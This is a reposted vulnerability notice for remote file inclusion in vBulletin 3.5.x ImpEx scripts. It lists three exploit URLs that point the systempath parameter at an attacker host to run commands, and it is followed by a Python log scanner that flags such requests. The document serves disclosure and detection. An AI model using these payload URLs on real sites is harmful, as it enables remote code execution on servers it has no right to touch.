I came across this on the internet...
Remote File Inclusion in VBulletin
version :
VBulletin 3.5.1
VBulletin 3.5.2
VBulletin 3.5.4
The bug resides in:
ImpExModule.php
ImpExController.php
ImpExDisplay.php
Exploit :
(1)
http://www.site.com/forum/impex/ImpE...hp?systempath=http://www.host_evil.com/cmd?&=id
(2)
http://www.site.com/forum/impex/ImpE...hp?systempath=http://www.host_evil.com/cmd?&=id
(3)
http://www.site.com/forum/impex/ImpE...hp?systempath=http://www.host_evil.com/cmd?&=id
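An added example, not part of the quoted advisory or of vBulletin's code: a log check for the request pattern above, flagging requests to the three ImpEx scripts whose systempath parameter carries a URL instead of a local path. The combined access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumed Apache/Nginx combined log format: client, request method, target.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" \d{3}')
# Script names listed in the advisory, lower-cased for comparison.
IMPEX_FILES = ("impexmodule.php", "impexcontroller.php", "impexdisplay.php")
# A value that starts with a scheme (http:, ftp:, php:, data:) or with //host.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]+:|//)', re.I)


def is_remote_systempath(target):
    """True if the request hits an ImpEx script with a URL-valued systempath."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    if "/impex/" not in path or not path.endswith(IMPEX_FILES):
        return False
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        if key.lower() == "systempath" and REMOTE_RE.match(unquote(value)):
            return True
    return False


def scan(lines):
    """Return (client, target) for every log line that matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_remote_systempath(m.group("target")):
            hits.append((m.group("client"), m.group("target")))
    return hits


# Constructed sample log lines (documentation addresses and example hosts).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2006:10:00:00 +0000] "GET /forum/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2006:10:00:05 +0000] "GET /forum/impex/ImpExModule.php?systempath=http://remote.example/x HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2006:10:00:09 +0000] "GET /forum/impex/ImpExDisplay.php?systempath=http%253A%252F%252Fremote.example%252Fx HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Jan/2006:10:01:00 +0000] "GET /forum/impex/index.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, target in scan(SAMPLE):
        print(client, target)
```

A hit only shows that the request was made; whether the include succeeded has to be checked on the host itself.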